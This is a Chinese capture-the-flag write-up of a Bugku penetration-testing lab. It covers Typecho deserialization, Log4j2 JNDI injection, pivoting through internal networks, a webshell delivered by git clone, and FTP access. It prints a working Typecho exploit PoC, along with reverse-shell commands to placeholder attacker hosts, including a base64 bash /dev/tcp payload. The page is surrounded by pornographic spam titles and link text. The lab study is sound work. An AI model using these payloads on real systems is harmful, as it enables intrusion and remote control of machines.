精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

記錄一次坎坷的打靶經歷

安全 應用安全
這次打靶依舊是學到了很多東西,比如log4j2漏洞的學習和復現等,而且我覺得自己對打靶的一個大致流程也越來越熟練,打靶時的思路也逐漸靈活,總體上感觸頗多。

前言

我也沒想到居然能有第二篇,可能是我打靶太過于坎坷(其實就是菜,嗚嗚嗚)。
言歸正傳,bugku的par模式,滲透測試2,共9個flag,打了三次,歷時三天,全部拿下。整個打靶過程依舊十分坎坷,在此,分享出來筆者打靶的過程,并呈現自己的思考,同時也希望能獲得大佬的指點。

過程

image.png

第一次打靶

0x01 flag1(Typecho反序列化)

啟動場景,給了一個ip:80,老樣子先上nmap掃一波

image.png


看來還是得從80端口開始,訪問頁面顯示

image.png


哇,這么大個flag,這是怕我看不見么,結果訪問并不是,年輕人不講武德,來騙,來偷襲...嗚嗚嗚

image.png


上dirsearch掃著,咱先熟悉一下整個站點的功能,這個站點是屬于博客類型的,插件識別出來這是一個Typecho的cms,版本為1.0

image.png


網上搜搜看有沒有歷史漏洞

image.png


嘿!還真有,剛好符合要求

image.png


挺輕松,直接上poc,

<?php
class Typecho_Feed{
const RSS2 = 'RSS 2.0';
private $_type;
private $_items;

public function __construct(){
//__toString函數檢查
$this->_type = self::RSS2;
//觸發__get函數
$_item['author'] = new Typecho_Request();
//觸發錯誤
$_item['category'] = array(new Typecho_Request());
$this->_items[0] = $_item;
}
}

class Typecho_Request{
private $_params = array();
private $_filter = array();

public function __construct(){
//回調函數的參數,即想要執行的命令
$this->_params['screenName'] = "ls";
//回調函數
$this->_filter[0] = "system";
}
}

$data = new Typecho_Feed();
$poc = array(
'adapter' => $data,
'prefix' => "typecho_"
);

//序列化
$s = serialize($poc);
//base64編碼
echo base64_encode($s);
?>

將poc運行后的結果,利用hackbar進行post傳參,看到當前目錄下的所有文件

image.png


當前目錄下沒有flag,去根目錄下看看,直接cat /f*,拿到flag

image.png

0x02 flag2(數據庫)

上一個flag沒有提示,但按照打靶正常流程,咱應該想辦法getshell,嘗試反彈一個shell回來。它本身是一個php站點,上面的poc中調用的又是system函數,最先想到的payload就是

php -r '$sock=fsockopen("xx.xx.xx.xx",1234);system("sh <&3 >&3 2>&3");'

但是因為單雙引號閉合的問題(有些函數里必需要有引號),放在poc里面感覺比較麻煩,想著寫一個一句話木馬進去,但是蟻劍死活連不上,最后還是回到原來的想法,反彈shell。處心積慮地構造了我大半天,終于構造完了,最后長這樣,用變量隔開了很多參數,然后利用字符串拼接的方式將整個命令拼接完整就OK啦

image.png


(后面發現只要給雙引號加個\轉義一下就行了,一口老血吐了出來)

image.png


接收到shell后,看了一下當前目錄并沒有flag,先用python提升一下shell的交互性吧

python3 -c 'import pty; pty.spawn("/bin/bash")'

image.png


然后看了一下自己剛剛想寫進去的那個一句話木馬

?嗯?我的$_POST呢?就離譜...

然后因為這個反彈回來的shell執行命令起來有點麻煩(敲錯命令想刪掉重敲,雖然它確實是刪掉了,但是顯示上并不會刪掉而且還會多兩個字符^H)

image.png


我覺得還是工具的ui界面操作起來更方便,想用echo命令寫一個一句話木馬進去,結果呀,這個$_POST依舊是寫不進去

image.png


最后我還是用老辦法,將這個一句話木馬分開,按兩次寫入shell.php,查閱了一下echo命令的一個詳細用法,于是就有了下圖

image.png


上蟻劍,成功連上

image.png


按照上次做滲透測試1的經驗,flag應該在數據庫里面,查看config.inc.php,拿到數據庫賬號密碼,

image.png


登錄后在數據庫中拿到flag

image.png


image.png

0x03 flag3(log4j2 rce)

依舊是沒有任何提示,想看看能不能提權,但就我那個提權三板斧是提不了的,只能看一下網段信息先走內網了

image.png


顯示有一個網段192.168.0.2/24,傳一個fscan掃一下(將結果輸出到文件里邊,不然沒有回顯)

image.png


看一下結果,提示192.168.0.3:80的title是不一樣的,掛一個frp,訪問一下該站點

image.png


什么也沒有,嘗試弱口令,沒用,爆破,沒結果,想著抓包試試爆破,結果返回包里邊提示source.zip

image.png


訪問看看,把源碼下載下來了

解壓出來,淺淺看一下,是一個log4j2的題,估摸著是考CVE-2021-44228漏洞的利用吧

image.png


但是說來慚愧,作為一個web手,這個漏洞自曝出到現在我還沒有去復現研究過,導致現在不知道怎么去利用它,剛好時間也到了,只能先去研究一下這個漏洞了,第一次打靶結束。

第二次打靶

0x03 flag4(log4j2 rce)

研究了一天這個漏洞,大致知道該漏洞的基本原理和利用方法了

基本原理:一些版本的log4j2中存在JNDI注入漏洞,當程序記錄用戶輸入的數據時,即可觸發該漏洞。
JNDI注入簡單來說就是在JNDI接口在初始化時,如:InitialContext.lookup(URI),如果URI可控,那么客戶端就可能會被攻擊。
而一些版本的Log4j2的JNDI支持并沒有限制可以解析的名稱。這樣的話就可以通過一些協議像rmi:和ldap:這種,下載遠程class,來運行惡意代碼,從而達到遠程代碼執行的目的。
利用方式:利用JNDI注入讓靶機通過rmi或者ldap等協議加載我們在公網vps上構造好的惡意類,從而拿下shell

思路清晰目的明確,在vulhub上找到相應的環境成功復現一遍后,就開始了我的第二次打靶之旅。

將反彈shell的payload進行base64加密

image.png


使用JNDI注入工具(JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)在vps上開啟好對應的服務,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "xx.xx.xx.xx"

image.png


之后便可以開始利用了,從上次得到的源碼里可以知道這個站點用的是springboot框架,

image.png


所以選擇工具給好的對應springboot的URI,構造好payload,vps上nc監聽反彈端口,將payload填入登錄框中,點擊提交即可接收到反彈回來的shell了

image.png


image.png


剛好還是root權限,讀一下flag

image.png

0x04 flag3、flag5

上一個flag提交后發現這居然是flag4

image.png


該不會真的需要在之前flag2上的機器提權后才能拿到flag3吧,嗚嗚嗚

然后仔細看了一下但當前目錄下的文件,有一個start.sh的腳本,打開看看

image.png


好家伙,一個log4j2的漏洞拿下3個flag,flag3在一個js文件里邊、flag4在根目錄下、flag5在root目錄下,單走一個6

image.png

0x06 flag6(git克隆)

看完flag后,界面顯示看起來屬實不舒服,想clear清屏又清不掉,

image.png


最后想起來擱B站up主紅隊筆記的視頻里學到過一招,

export TERM=xterm-color

成功清屏

image.png


接著做下去,上一個flag依舊是沒有提示,但已經有root權限了,正常流程就是看看內網了,ifconfig看一下網段,好家伙,沒有ifconfig命令

image.png


ls /usr/bin看一下用戶命令有哪些

image.png


有wget,可以直接從vps上下載frpc,但是不知道這臺機子的具體網絡信息呀,這時候其實就有一點卡住了,不知道該怎樣獲取這臺機子的一個網卡信息,怎樣進行下一步呢?

嘿嘿,我去問了一下度娘,

image.png


執行ip addr show命令后發現還有一層192.168.1.2/24的網段,傳一個fscan上去掃一下

image.png


image.png


依舊是看title,發現192.168.1.3的是之前沒有見過的,掛frp開socks5代理,成功訪問該站點(能wget從公網上下載就已經不需要考慮出不出網的問題了)

image.png


這個貌似是用來clone倉庫的,看一下插件是一個php站點

image.png


表單里邊有bugku的一個git倉庫提示,訪問看看

image.png


是一個漏洞測試靶場,并沒有給什么信息,直接將這個git倉庫克隆一下,

image.png


給了個超鏈接,訪問一看,flag出了

image.png


image.png

0x07 flag7(git克隆上馬)

這里可以克隆倉庫,而且可以訪問到克隆的倉庫里的文件,你說這種是不是很像文件上傳,于是我自己建了個倉庫,放上一句話木馬,clone后訪問發現它直接將文件內容輸出了,并沒有執行解析

image.png


可能是做了限制吧,然后嘗試修改倉庫里文件后綴看看能不能繞過限制,重新clone,好家伙,clone同一個倉庫,里邊的文件不會變了(不管遠程倉庫做了什么修改,clone的倉庫只保留第一次clone的結果,估摸著是緩存的原因),沒辦法只能多創建幾個倉庫了,最后測試了很多次后,發現phtml后綴的文件能被解析執行

image.png


直接上蟻劍,拿下flag

image.png


image.png


貼上我的倉庫地址(https://github.com/QRLing1/hello4)

0x08 flag8(ftp)

這次終于有提示了,

image.png


?什么東東,沒看懂,離譜,還是先看一下這臺機子的網卡信息吧

image.png


還有一層10.10.0.2/24的網段,上fscan掃一下(將結果輸出到文件中,不然沒有回顯)

image.png


看一下結果發現10.10.0.3這臺機子只開了21端口,該端口對應的是ftp服務,題目的提示該不會是ftp的賬號密碼吧,繼續上frp掛代理,可是這次再上傳frpc的時候一直出現問題,

image.png


唯一上傳成功的frp還不能運行

image.png


最后就一直卡在了這里,之后時間也差不多結束了,第二次打靶也就此告終。

第三次打靶

0x08 flag8(ftp)

重新開啟靶場后,想再試試傳一個frpc,這次上傳的很順利,之前傳不上去可能是網絡問題吧,掛上代理后嘗試使用xftp進行連接,賬戶密碼確實是guest,但xftp連接上后就一直卡死

image.png


根本讀取不到文件,換FileZilla連接也是卡死,就離譜

image.png


之后想著還是用ftp命令行進行連接吧

轉到kali,先在/etc/proxychains4.conf里加上socks5代理,

image.png


然后再使用ftp進行連接,終于連上了

image.png


get flag遠程下載flag文件拿到flag

image.png

0x09 flag9(ftp)

從上一個flag給出的提示,ls / 看一下根目錄的文件

image.png


還真有,直接get /flag,結果并沒有拿下flag

image.png


一下子給我整蒙了,難不成還要彈個shell回來提權?但是就開了一個21端口也執行不了什么命令,怎么彈shell呀,迷茫了很久,切換到根目錄下面get flag,直接拿下了,好家伙,離大譜

image.png


image.png

總結

到這里就結束了,回顧整個打靶過程,還是能清晰的感受到我是一如既往的菜。這次打靶依舊是學到了很多東西,比如log4j2漏洞的學習和復現等,而且我覺得自己對打靶的一個大致流程也越來越熟練,打靶時的思路也逐漸靈活,總體上感觸頗多。下次繼續,嘿嘿。
希望師傅們不喜勿噴,感謝。

參考資料

??JNDI注入學習??16-PHP代碼審計——Typecho1.0.14反序列化漏洞
log4j2(CVE-2021-44228)漏洞復現實操(小白向)
CVE-2021-44228-Log4j漏洞分析及漏洞複現(Log4j POC)
??Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228)??

責任編輯:武曉燕 來源: FreeBuf.COM??
相關推薦

2012-08-28 09:21:59

Ajax查錯經歷Web

2025-03-17 10:01:07

2021-12-06 19:29:17

LRU內存算法

2016-12-06 09:34:33

線程框架經歷

2013-04-01 10:27:37

程序員失業

2011-04-13 09:21:30

死鎖SQL Server

2013-01-17 10:31:13

JavaScriptWeb開發firebug

2021-04-13 18:17:48

Hbase集群配置

2021-01-22 05:35:19

Lvm模塊Multipath

2018-01-15 14:50:49

APP轉讓App賬號

2012-07-12 14:35:31

面試經歷

2018-09-14 10:48:45

Java內存泄漏

2022-06-10 11:06:23

服務下線

2015-04-28 15:31:09

2017-11-09 09:06:29

流量暴增優化

2020-11-23 07:13:13

Nodejs源碼

2010-09-07 11:16:14

SQL語句

2022-07-13 08:31:18

React問題排查

2018-12-06 16:25:39

數據庫服務器線程池

2020-02-10 10:15:31

技術研發指標
點贊
收藏

51CTO技術棧公眾號

青青草原国产在线| www.亚洲黄色| 欧美mv日韩| 欧美一级欧美一级在线播放| 日本精品久久久久久久久久| 男男激情在线| 久久成人18免费观看| 久久97精品久久久久久久不卡| 图片区偷拍区小说区| 欧美大胆性生话| 亚洲私人影院在线观看| 亚洲xxxxx性| 天天干天天干天天干天天| 久久综合国产| 亚洲欧洲午夜一线一品| 超碰在线资源站| 芒果视频成人app| 一区二区三区精品在线| 无遮挡亚洲一区| 亚洲男女视频在线观看| 日本vs亚洲vs韩国一区三区| 欧美巨乳在线观看| 少妇av片在线观看| 国产精品男女| 日韩一区二区三| 国产wwwxx| a天堂资源在线| 亚洲免费观看高清完整版在线| 蜜桃传媒视频第一区入口在线看| 国内精品久久久久久久久久久 | 精品91一区二区三区| 亚州男人的天堂| 国产成人午夜电影网| 国产精品亚洲视频在线观看| 69成人免费视频| 欧美日韩 国产精品| 中文字幕在线看视频国产欧美在线看完整| 黄色性视频网站| 老司机亚洲精品一区二区| 欧美性做爰猛烈叫床潮| 亚洲国产精品久久久久婷蜜芽| av毛片在线| 日韩一区中文字幕| 亚洲一区三区电影在线观看| 国产黄在线播放| 2023国产一二三区日本精品2022| 不卡一区二区三区视频| 国产精品无码天天爽视频| 日本麻豆一区二区三区视频| 国产成人av在线| 九九热在线视频播放| 亚洲福利专区| 97精品国产97久久久久久春色| porn亚洲| 亚洲精品一区在线| 欧美三级三级三级| 日韩欧美国产电影| 男人舔女人下面高潮视频| 看黄在线观看| 精品日本高清在线播放| 精选一区二区三区四区五区| 国产资源在线视频| 欧美xxxxhdvideosex| 一色屋精品亚洲香蕉网站| 亚洲成人精品电影在线观看| 二区在线视频| 欧美韩日一区二区三区四区| 神马一区二区影院| www.成人.com| 中文字幕一区视频| 日本黄色a视频| caopen在线视频| 一区二区不卡在线播放| 成人精品视频在线播放| yellow字幕网在线| 黄色裸体一级片| 亚洲熟妇无码久久精品| 亚洲一区成人| 茄子视频成人在线| 波多野结衣av无码| 久久精品国产99| 亚洲va男人天堂| 亚洲国产精品久久久久爰性色| 成人综合婷婷国产精品久久蜜臀 | 一区二区av| 免费在线看a| 亚洲午夜视频在线| 大陆极品少妇内射aaaaa| 欧美日韩五码| 91精品国产丝袜白色高跟鞋| 亚洲精品乱码久久久久久蜜桃欧美| 成人性生交大片免费看中文视频| 图片区亚洲欧美小说区| 日韩欧美中文字幕在线播放| 成人性视频欧美一区二区三区| 久久麻豆视频| 精品粉嫩超白一线天av| 一道本在线观看| 伊人久久大香线蕉综合四虎小说 | 精品无码一区二区三区蜜臀| 亚洲国产裸拍裸体视频在线观看乱了中文| 青青精品视频播放| 国产精品视频在线观看免费| 97久久精品人人爽人人爽蜜臀| 亚洲成人a**址| 国产盗摄——sm在线视频| 欧美午夜精品久久久久久孕妇| 麻豆传媒在线看| 国产精品午夜一区二区三区| 久久国产色av| 无码人妻一区二区三区免费| 国产精品一区免费视频| 欧美一区2区三区4区公司二百| 91网址在线观看| а_天堂中文在线| 精品久久久久久久久久国产| 国产亚洲视频一区| 蜜桃a∨噜噜一区二区三区| 久久夜色精品亚洲噜噜国产mv| www.av麻豆| 国产精品66部| 伊人久久大香线蕉av一区| 男女羞羞在线观看| 欧美大黄免费观看| 后入内射无码人妻一区| 国产精品美女久久久| 亚洲xxxxx性| 午夜毛片在线| 欧美综合一区二区| 亚洲成人av免费在线观看| 影音先锋日韩精品| 国产精品一区二区三| 深夜福利在线看| 亚洲午夜三级在线| 不卡的一区二区| 图片小说视频色综合| 国产精品色午夜在线观看| 久久这里精品| 黑人狂躁日本妞一区二区三区| 久久久男人的天堂| 亚洲欧美亚洲| 99高清视频有精品视频| 免费a级在线播放| 欧美美女激情18p| 亚洲精品成人av久久| 天堂久久一区二区三区| 免费精品视频一区| 电影一区二区三| 亚洲欧美综合区自拍另类| 欧美日韩综合在线观看| www.欧美日韩国产在线| 九色自拍视频在线观看| 另类在线视频| 欧美在线视频网| 青青草手机在线| 色婷婷久久一区二区三区麻豆| 国产交换配乱淫视频免费| 麻豆精品网站| 日韩精品av一区二区三区| 日韩中文视频| 日韩中文字幕国产| 国产视频手机在线观看| 伊人色综合久久天天人手人婷| 亚洲国产午夜精品| 欧美视频日韩| 好看的日韩精品视频在线| 亚洲精品一区国产精品| 福利视频在线| 日韩一区二区在线观看视频| 免费一级片视频| av日韩在线网站| 国产精品无码av在线播放| 五月综合久久| 国产精品美女www爽爽爽视频| 3d成人动漫在线| 欧美一区二区三区白人| 懂色av.com| 91丝袜高跟美女视频| 日韩一级片播放| 亚州av乱码久久精品蜜桃| 亚洲一区二区三区视频| 国产99在线观看| 一区二区三区美女xx视频| 一卡二卡在线视频| 亚洲综合在线视频| 北岛玲一区二区| 蜜臀91精品一区二区三区| 成人手机在线播放| 小说区图片区色综合区| 国产日韩在线看| 日韩成人伦理| 亚洲人成网站免费播放| 国产精品一区二区三区在线免费观看| 亚洲在线中文字幕| 黄色片网站免费| 岛国精品在线观看| 成人免费xxxxx在线视频| 欧美 日韩 国产精品免费观看| 好看的日韩精品| 成人国产精品久久| 欧美专区在线播放| av网址在线| 亚洲欧美一区二区精品久久久| 国产又粗又猛又爽又黄的| 亚洲成av人综合在线观看| 长河落日免费高清观看| av电影天堂一区二区在线观看| 欧美一级xxxx| 亚洲免费一区二区| www.激情网| 日韩大片在线| 欧美日韩亚洲免费| heyzo欧美激情| 国产免费一区二区三区香蕉精| 国产在线看片免费视频在线观看| 久久九九免费视频| 精品无人乱码| 亚洲成av人乱码色午夜| 国产麻豆91视频| 在线观看国产日韩| 成人免费a视频| 亚洲一区二区av电影| 一起操在线播放| 亚洲国产精品黑人久久久| 精品无码国产一区二区三区51安| 国产一区二区免费视频| 韩国中文字幕av| 久久久久国产精品一区三寸| 少妇高潮毛片色欲ava片| 女人香蕉久久**毛片精品| 中国人体摄影一区二区三区| 国产一区二区在线| 久久婷婷人人澡人人喊人人爽| 视频在线一区| 亚洲mm色国产网站| 五月天色综合| 国产精品中文在线| 久久精品国产福利| 国产精品久久久| 亚洲精品国产嫩草在线观看| 亚洲97在线观看| aaa在线播放视频| 欧美激情视频在线免费观看 欧美视频免费一| 欧美性天天影视| 色多多国产成人永久免费网站| 懂色av中文在线| 在线观看91久久久久久| 国产精品麻豆一区二区三区| 在线观看欧美日韩| av在线第一页| 日韩中文第一页| 欧美日韩xx| 久久天堂av综合合色| 三区四区电影在线观看| 日韩在线观看免费全| 免费黄色在线网站| 久久综合免费视频| 在线播放蜜桃麻豆| 久久久久久久av| 9765激情中文在线| 欧美在线不卡区| 欧美日韩视频网站| 国产精品亚洲аv天堂网| 国产高清视频一区二区| 99在线看视频| 日韩成人午夜| 欧美一区二区在线| 日韩欧美伦理| 成人在线免费观看网址| 黄色在线成人| 欧美少妇性生活视频| 美女爽到高潮91| 男插女视频网站| 北岛玲一区二区三区四区| 中文字幕国产专区| 中文字幕在线不卡一区二区三区| 日韩av手机在线免费观看| 亚洲在线视频免费观看| 人妻丰满熟妇av无码区| 欧美日韩在线三区| 午夜老司机福利| 亚洲片在线观看| 麻豆免费在线观看| 97久久精品视频| 福利一区二区| 成人黄动漫网站免费| 欧美人与物videos另类xxxxx| 手机福利在线视频| 国产精品一卡| 999热精品视频| 91麻豆swag| 男女性高潮免费网站| 欧美日韩性视频在线| 国产又粗又猛又爽| 亚洲欧美国产精品专区久久 | 高清视频一区二区| 加勒比一区二区| 亚洲精品美国一| 无码人妻aⅴ一区二区三区有奶水| 欧美色图天堂网| 十八禁一区二区三区| 久久精品中文字幕| 欧美电影免费看| 国产精品swag| 久久在线视频| 人妻精品无码一区二区三区| 国产一区二区精品久久| 久久精品无码一区| 亚洲成人福利片| 99久久国产免费| 在线视频中文亚洲| 妞干网免费在线视频| 147欧美人体大胆444| 青草国产精品| 日韩精品一区二区三区色欲av| 国产精品一级黄| 999福利视频| 日本韩国欧美国产| 日本成人动漫在线观看| 久久精品国产综合| 福利一区二区| 日韩精品久久久毛片一区二区| 激情六月综合| 欧美人与性动交α欧美精品| 中文字幕在线不卡一区二区三区| 黄色污污网站在线观看| 亚洲精品国产综合久久| 里番在线播放| 91视频国产一区| 国产精品久久久久蜜臀| 国产嫩草在线观看| 久久久美女毛片| 精品欧美一区二区三区免费观看 | 国产视频999| 欧美日韩国产免费观看视频| av免费播放网址| 91啦中文在线观看| 天天干在线播放| 日韩成人中文字幕| 黄色激情在线播放| 精品国产综合| 亚洲精品男同| 性高潮免费视频| 亚洲福利一二三区| 内射无码专区久久亚洲| 久久久久久91| 激情视频极品美女日韩| 人人妻人人做人人爽| 成+人+亚洲+综合天堂| 日本一级黄色大片| 日韩成人av一区| 欧美黑人粗大| 亚洲精品不卡| 国产中文字幕精品| 久久久久久av无码免费网站| 欧美大黄免费观看| 欧美私密网站| 日韩免费电影一区二区三区| 日本欧美一区二区| 成人在线观看小视频| 日韩欧美在线网站| 韩国精品一区| 午夜一区二区三视频在线观看| 久久精品国产77777蜜臀| 亚洲国产精品免费在线观看| 精品噜噜噜噜久久久久久久久试看| 福利写真视频网站在线| 久久66热这里只有精品| 日韩av一级电影| 91高清免费观看| 亚洲国产成人在线视频| 丁香六月综合| 亚洲天堂av免费在线观看| 国产精品18久久久久久久久久久久| 久久亚洲精品大全| 亚洲欧洲视频在线| 国产亚洲高清在线观看| 波多野结衣乳巨码无在线| 国产三级欧美三级| 国产浮力第一页| 欧美中文字幕视频| 亚洲国产精品91| 国产精品探花一区二区在线观看| 在线观看亚洲一区| 日本在线视频网址| 日韩电影免费观看在| 国产麻豆一精品一av一免费| 日韩伦人妻无码| 深夜福利91大全| 蜜臀av一区| 热久久久久久久久| 欧美日韩国产精品一区二区三区四区 | 日韩欧美成人激情| 日韩免费小视频| 六月婷婷激情综合| 欧美激情一区不卡| 午夜视频1000| 亚洲va欧美va国产综合久久| 三级久久三级久久| 久久久久久久久97|